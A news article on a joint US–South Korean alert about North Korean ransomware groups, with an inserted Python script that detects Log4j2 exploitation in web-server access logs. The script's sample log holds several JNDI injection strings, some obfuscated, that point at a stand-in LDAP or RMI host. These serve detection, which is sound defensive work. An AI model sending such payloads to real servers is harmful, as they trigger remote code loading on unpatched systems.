ITBusiness.ca

U.S., South Korea issue alert on North Korean-based ransomware groups


North Korean state-sponsored ransomware groups are targeting hospitals and other critical infrastructure organizations, U.S. and South Korean law enforcement and intelligence agencies are warning.

“The authoring agencies assess that an unspecified amount of revenue from these cryptocurrency operations supports DPRK (Democratic People’s Republic of Korea) national-level priorities and objectives, including cyber operations targeting the United States and South Korea governments,” the alert issued Thursday says.

“Specific targets include Department of Defense Information Networks and Defense Industrial Base member networks. The IOCs [indicators of compromise] in this product should be useful to sectors previously targeted by DPRK cyber operations (e.g., U.S. government, Department of Defense, and Defense Industrial Base). The authoring agencies highly discourage paying ransoms as doing so does not guarantee files and records will be recovered and may pose sanctions risks.”

The report includes the latest tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) used by North Korean-based attackers. Among the more recently observed techniques are the exploitation of unpatched applications affected by the Apache Log4j2 vulnerability and of unpatched SonicWall appliances to gain initial access.
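Log4j2 exploitation attempts are cheap to look for in web-server access logs, but attackers routinely obfuscate the lookup string so that a search for the literal text "jndi:" misses it. The following Python detector is an added example written for this page, not code from the advisory or its authoring agencies; the access-log lines it scans are constructed here, and the function names (normalize_lookups, find_jndi, scan_log) are the example's own. It URL-decodes each line, collapses the nested lookups that Log4j 2 would resolve before evaluating the outer ${jndi:...} expression, and only then matches the plain form, reporting the client address, the JNDI scheme and the callback target.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the advisory).
# Line 1 is benign. Lines 2-4 carry a JNDI lookup in the User-Agent or the
# query string; the last two are obfuscated with nested lookups (URL-encoded
# ${lower:..} pieces, and ${env:..:-default} fallbacks) so that the literal
# word "jndi" never appears in the raw line.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Feb/2023:09:14:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Feb/2023:09:14:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.4:1389/a}"
203.0.113.9 - - [10/Feb/2023:09:14:06 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3A%24%7Blower%3Al%7Ddap%3A%2F%2F198.51.100.4%3A1389%2Fb%7D HTTP/1.1" 400 0 "-" "curl/7.88"
203.0.113.9 - - [10/Feb/2023:09:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-r}mi://198.51.100.4/c}"
"""

# Inner lookups that Log4j 2 resolves before it evaluates the enclosing ${jndi:...}:
#   ${lower:j} / ${upper:J}   -> j / J   (case does not matter to the final match)
#   ${env:NOPE:-j} / ${::-j}  -> j       (the ":-default" branch, taken when the
#                                          variable is unset, which the attacker relies on)
_INNER = [
    re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*)\}", re.I),
    re.compile(r"\$\{[^${}]*?:-([^${}]*)\}"),
]

# The plain form we ultimately look for: ${jndi:<scheme>:[//]<target>}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*/{0,2}([^\s}]+)", re.I)


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """URL-decode, then collapse nested lookups innermost-first (as Log4j 2 does)
    until nothing changes, so an obfuscated payload reduces to plain ${jndi:...}."""
    text = unquote(text)
    for _ in range(max_rounds):
        before = text
        for pat in _INNER:
            text = pat.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def find_jndi(text: str) -> Optional[Tuple[str, str]]:
    """Return (scheme, target) for the first JNDI lookup in text, or None."""
    m = _JNDI.search(normalize_lookups(text))
    return (m.group(1).lower(), m.group(2)) if m else None


@dataclass
class Detection:
    line_no: int
    client_ip: str
    scheme: str
    target: str


def scan_log(log_text: str) -> List[Detection]:
    """Scan common-log-format lines; the client IP is the first field."""
    hits: List[Detection] = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        if not line.strip():
            continue
        found = find_jndi(line)
        if found:
            scheme, target = found
            hits.append(Detection(line_no, line.split()[0], scheme, target))
    return hits


if __name__ == "__main__":
    for d in scan_log(SAMPLE_LOG):
        print(f"line {d.line_no}: {d.client_ip} -> jndi:{d.scheme}://{d.target}")
```

The two inner-lookup patterns cover the obfuscations most often seen in the wild, but Log4j 2 supports further lookups (sys, date, and others), so treat a hit as a high-confidence triage signal rather than a complete detection, and pair it with the hard fix, which is patching the application and removing unpatched SonicWall and other edge devices from the exposed perimeter.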

North Korean attackers are known for obscuring their origin, the report adds, including at times posing as other ransomware groups, such as the REvil gang.

The alert is an update to a July 6, 2022 warning by American intelligence and law enforcement agencies, including the Cybersecurity and Infrastructure Security Agency (CISA), the FBI and the NSA.

That report noted the use by North Korean groups of the Maui strain of ransomware. The new report adds that these groups are also using a strain called H0lyGh0st, described by Microsoft in a July 14, 2022 report.

The latest report comes the same week as the Associated Press reported that a United Nations panel concluded North Korean hackers working for the government stole virtual assets, including cryptocurrency and intellectual property, estimated to be worth between US$630 million and more than US$1 billion.

“2022 was a record-breaking year for DPRK virtual asset theft,” the AP quoted the report as saying. In April 2022, the U.S. linked North Korean-backed hackers to the US$615 million crypto heist on the popular online game Axie Infinity.

The AP said the panel identified three groups – Kimsuky, Lazarus Group and Andariel — as the main North Korean attackers.

The AP quoted the panel as saying that between February and July 2022 the Lazarus Group “reportedly targeted energy providers in multiple member states using a vulnerability” to install malware and gain long-term access. It said this “aligns with historical Lazarus intrusions targeting critical infrastructure and energy companies … to siphon off proprietary intellectual property.”

The U.S./South Korea alert urges IT and security departments to
